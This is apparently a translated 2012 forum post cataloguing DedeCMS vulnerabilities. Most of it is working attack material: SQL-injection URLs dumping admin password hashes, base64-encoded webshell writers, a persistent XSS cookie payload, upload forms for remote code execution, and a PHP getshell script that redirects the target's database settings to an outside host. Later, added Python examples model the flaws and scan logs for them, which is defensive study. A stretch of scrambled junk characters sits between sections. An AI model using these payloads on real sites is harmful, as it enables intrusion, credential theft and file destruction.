DedeCMS vulnerability summary

Posted 2012-10-18 10:42:14
DedeCMS 5.6 rss.php injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1

DedeCMS v5.6 embedded malicious code execution vulnerability
Register a member account and upload a software item; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php, a one-line shell with password xiao.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DedeCMS all versions: gotopage parameter XSS vulnerability
1. Copy and paste the URL below into the browser to trigger the XSS and install the XSS rootkit. Note that IE8/9 block URL-based XSS, so the XSS filter must be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; from then on, any of the URLs below triggers our XSS no matter how it is accessed.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda

http://v57.demo.dedecms.com/dede/login.php
DedeCMS (织梦) variable override getshell
#!usr/bin/php -w
<?php
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author:
www.heixiaozi.comwww.webvul.com
');
echo "\r\n";
if($argv[2]==null){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/
Example:
php '.$argv[0].'
www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
if (strpos($exp,"OK")>12){
echo "
Exploit Success \n";
if($aid==1)echo "
Shell:".$url."/$path/data/cache/fuck.php\n" ;
if($aid==2)echo "
Shell:".$url."/$path/fuck.php\n" ;
if($aid==3)echo "
Shell:".$url."/$path/plus/fuck.php\n";
}else{
echo "
Exploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "
No response from ".$host."\n";
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp;
}
}
?>
DedeCMS v5.6-5.7 unauthorized access vulnerability (direct entry to the backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value to enter the site backend directly.
The prerequisite for this vulnerability is knowing the backend path.
DedeCMS (织梦) tag remote file write vulnerability
Precondition: you must have your own dede database ready, then insert the data: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');
Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
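The mechanism behind the _COOKIE[GLOBALS][cfg_dbhost] parameters in the form above (and the _POST[GLOBALS][...] parameters in the backend-login section) as an added Python simulation, not code from the original post or from DedeCMS: a request importer that lets a GLOBALS entry overwrite configuration, beside a hardened importer that rejects such keys. The deny-list pattern and the config values are assumptions modelled on the class of fix, not a copy of the project's code.

```python
import re

# Constructed stand-in for the cfg_* globals a PHP application keeps.
DEFAULT_CONFIG = {
    "cfg_dbhost": "localhost",
    "cfg_dbuser": "dede",
    "cfg_dbpwd": "secret",
    "cfg_dbname": "dedecms",
    "cfg_dbprefix": "dede_",
}

# Assumed deny-list: no request key may name a superglobal or start with the
# configuration prefix. Modelled on the class of fix, not the project's code.
FORBIDDEN_KEY = re.compile(r"^(?:cfg_|GLOBALS|_GET|_POST|_COOKIE|_SESSION|_SERVER)")

SUPERGLOBALS = ("_COOKIE", "_POST", "_GET")


def parse_php_key(raw):
    """Split a PHP-style bracketed name such as '_COOKIE[GLOBALS][cfg_dbhost]'
    into its path ['_COOKIE', 'GLOBALS', 'cfg_dbhost']."""
    head, _, rest = raw.partition("[")
    path = [head]
    if rest:
        path += re.findall(r"([^\[\]]*)\]", "[" + rest)
    return path


def naive_register_globals(config, request):
    """Flawed import: every request variable lands in the global scope, and an
    entry named GLOBALS is merged into the real globals, so
    GLOBALS[cfg_dbhost] silently replaces the configured database host."""
    globs = dict(config)
    for raw, value in request.items():
        path = parse_php_key(raw)
        if path[0] in SUPERGLOBALS:      # PHP merges _COOKIE/_POST/_GET into scope
            path = path[1:]
        if len(path) == 2 and path[0] == "GLOBALS":
            globs[path[1]] = value       # the overwrite the payload relies on
        elif len(path) == 1:
            globs[path[0]] = value
    return globs


def hardened_register_globals(config, request):
    """Same import, but any key whose path contains a forbidden name is
    rejected before assignment, so cfg_* values cannot be set remotely."""
    globs = dict(config)
    for raw, value in request.items():
        path = parse_php_key(raw)
        if path[0] in SUPERGLOBALS:
            path = path[1:]
        if not path or any(FORBIDDEN_KEY.match(p) for p in path):
            raise ValueError("request variable not allowed: %s" % raw)
        globs[path[0]] = value
    return globs


# Constructed request reusing the parameter names from the form above; the
# host value is a placeholder, not a real server.
EVIL_REQUEST = {
    "_COOKIE[GLOBALS][cfg_dbhost]": "attacker-db.invalid",
    "_COOKIE[GLOBALS][cfg_dbuser]": "exploit",
    "nocache": "true",
}
BENIGN_REQUEST = {"nocache": "true", "aid": "1"}


def demo():
    """Return (host seen by the naive importer, host seen by the hardened one)."""
    naive_host = naive_register_globals(DEFAULT_CONFIG, EVIL_REQUEST)["cfg_dbhost"]
    try:
        hardened_register_globals(DEFAULT_CONFIG, EVIL_REQUEST)
        hardened_host = "request accepted"
    except ValueError:
        hardened_host = DEFAULT_CONFIG["cfg_dbhost"]   # config untouched
    return naive_host, hardened_host
```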

Dedecms <= V5.6 Final template execution vulnerability
Register a user, enter the member backend, publish an article and upload an image, then in attachment management replace the image with a crafted template. For example, the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (if the image format is restricted, prepend gif89a):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source, and construct a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />
<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>
<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>
<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>
<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)
<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>
<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(这里构造)
</div>
<!-- 表单操作区域 -->
<h3 class="meTitle">详细内容</h3>
<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />
<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>
</div>
</form>
Submit; if the site reports that the edit succeeded, the template path has been changed. 3. Visit the edited article:
Assuming the edited article's aid is 2, request:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DedeCMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Build the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then construct the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>

DedeCMS (织梦) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
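The defect behind the oldface value above is a path check that never normalises "..". This added Python example, not code from the original post or from DedeCMS, contrasts a prefix-only check with a containment check done after normalisation; UPLOAD_ROOT and the sample values are constructed assumptions.

```python
import posixpath

# Assumed filesystem location of the site's uploads directory (constructed).
UPLOAD_ROOT = "/var/www/dede/uploads"


def naive_prefix_check(oldface):
    """The weak check: accept anything that merely starts with the expected
    prefix. It passes the traversal value from the URL above unchanged."""
    return oldface.startswith("/uploads/userup/")


def resolve_upload_path(oldface, upload_root=UPLOAD_ROOT):
    """Map a user-supplied oldface value onto the filesystem and refuse any
    result that leaves upload_root once '..' segments are collapsed.
    Normalisation here is lexical (posixpath.normpath); on a real server also
    apply os.path.realpath so a symlink inside the tree cannot point out."""
    rel = oldface.lstrip("/")
    if rel.startswith("uploads/"):
        rel = rel[len("uploads/"):]
    candidate = posixpath.normpath(posixpath.join(upload_root, rel))
    if candidate != upload_root and not candidate.startswith(upload_root + "/"):
        raise ValueError("path escapes the uploads directory: %r" % oldface)
    return candidate


def safe_to_delete(oldface, upload_root=UPLOAD_ROOT):
    """True only when the path stays inside the uploads directory and names
    something other than the directory itself."""
    try:
        candidate = resolve_upload_path(oldface, upload_root)
    except ValueError:
        return False
    return candidate != upload_root


# Constructed inputs: the traversal value from the URL above and a normal avatar.
TRAVERSAL = "/uploads/userup/8/../../../member/templets/images/m_logo.gif"
NORMAL = "/uploads/userup/8/face.jpg"
```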
# b3 E2 m5 s7 \) i3 [1 N& @
4 v. I  O3 b( U" j# ^, j
" r, C# ?. s" q/ D% R6 S* q- B" g& S* ~( F
. z/ z( F; `% H! e/ z
( \( L# p: U. H
5 Z8 U' o7 o1 b, T! ]/ f. P* K0 S
/ F% B5 i8 f0 w, k

: s3 O4 ?+ e% f# R* N7 p8 ~& T+ L6 M( T9 y

DedeCMS (织梦) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../

DedeCMS V5.6 plus/advancedsearch.php arbitrary SQL execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and last 7 characters removed, leaving 20 characters; to get the 16-character MD5, drop a further 3 from the front and 1 from the end.
DedeCMS (织梦) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
DedeCMS (织梦) select_soft_post.php uninitialized variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>

DedeCMS (织梦) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
It relies on a MySQL numeric field overflow error combined with DedeCMS writing database error messages into a PHP file whose header is not validated.
1. Visit:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
The error message is displayed.
2. Visit
http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run test.html from dede.rar, noting that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After clicking OK, seeing the output from step 2 means the trojan file was uploaded successfully.

DedeCMS (织梦) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
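A log-side detector for the request shapes catalogued throughout this post (the GLOBALS override parameters, advancedsearch.php's sql parameter, the gotopage XSS, the digg_frame.php error-log poisoning, the edit_face.php and carbuyaction.php traversals, and the updatexml/union injections), written as an added Python example that is not part of the original post; the rule patterns, sample log lines and addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Detection rules derived from the request shapes listed in this post:
# (rule name, script the rule is limited to or None, regex over the decoded query).
RULES = [
    ("variable-override", None,
     re.compile(r"[&?]_(?:COOKIE|POST|GET)\[GLOBALS\]", re.I)),
    ("advancedsearch-raw-sql", "advancedsearch.php",
     re.compile(r"[&?]sql=", re.I)),
    ("gotopage-xss", "login.php",
     re.compile(r"[&?]gotopage=[^&]*<script", re.I)),
    ("digg_frame-log-poison", "digg_frame.php",
     re.compile(r"[&?]mid=[^&]*(?:\*/|\?>|eval\()", re.I)),
    ("edit_face-traversal", "edit_face.php",
     re.compile(r"dopost=delold.*oldface=[^&]*\.\./", re.I)),
    ("carbuyaction-lfi", "carbuyaction.php",
     re.compile(r"[&?]code=[^&]*\.\./", re.I)),
    ("sqli-function", None,
     re.compile(r"updatexml\s*\(|union\s+select", re.I)),
]

# Request line inside an Apache/Nginx combined-format log entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def classify_request(target):
    """Return the names of all rules matching one request target (path?query).
    The query is percent-decoded first so encoded brackets and parentheses
    (%5B, %28) cannot slip past the patterns."""
    path, _, query = target.partition("?")
    decoded = "?" + unquote_plus(query)          # leading '?' anchors the first parameter
    script = path.rsplit("/", 1)[-1].lower()
    hits = []
    for name, wanted_script, pattern in RULES:
        if wanted_script and script != wanted_script:
            continue
        if pattern.search(decoded):
            hits.append(name)
    return hits


def scan_log(lines):
    """Return [(line number, target, matched rule names)] for suspicious entries.
    Only the request line is inspected: parameters sent in a POST body (as the
    mytag_js.php form does) are not in the access log and need a WAF or
    full-request capture to detect."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue
        hits = classify_request(m.group("target"))
        if hits:
            findings.append((n, m.group("target"), hits))
    return findings


# Constructed sample log; addresses are documentation ranges, not real hosts.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2012:10:42:20 +0800] "POST /plus/mytag_js.php?aid=1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=203.0.113.9 HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Oct/2012:10:43:01 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [18/Oct/2012:10:44:09 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [18/Oct/2012:10:44:30 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [18/Oct/2012:10:45:12 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml%281,1,1%29%23\'][0]=1 HTTP/1.1" 500 0 "-" "Mozilla/5.0"',
]
```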